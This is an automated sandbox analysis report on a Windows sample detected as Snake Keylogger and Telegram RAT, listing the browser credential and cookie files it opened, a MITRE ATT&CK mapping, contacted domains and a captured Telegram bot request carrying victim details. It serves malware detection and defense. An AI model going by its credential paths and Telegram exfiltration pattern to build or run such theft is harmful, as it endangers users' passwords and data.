Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\87h216Snb7.exe

0_2_0040351C

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7304, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7304, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7304, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	131 Virtualization/Sandbox Evasion	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
87h216Snb7.exe	42%	ReversingLabs	Win32.Trojan.SnakeLogger

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exe	42%	ReversingLabs	Win32.Trojan.SnakeLogger

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.19.174	true	false	high
drive.usercontent.google.com	142.250.181.97	true	false	high
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2018/12/2024%20/%2010:14:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	msiexec.exe, 0000000B.00000002.2529814283.0000000020C75000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020C66000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/ek	msiexec.exe, 0000000B.00000003.1661339544.0000000005013000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2517147937.0000000004FFC000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	msiexec.exe, 0000000B.00000002.2529814283.0000000020C70000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmp	false	high
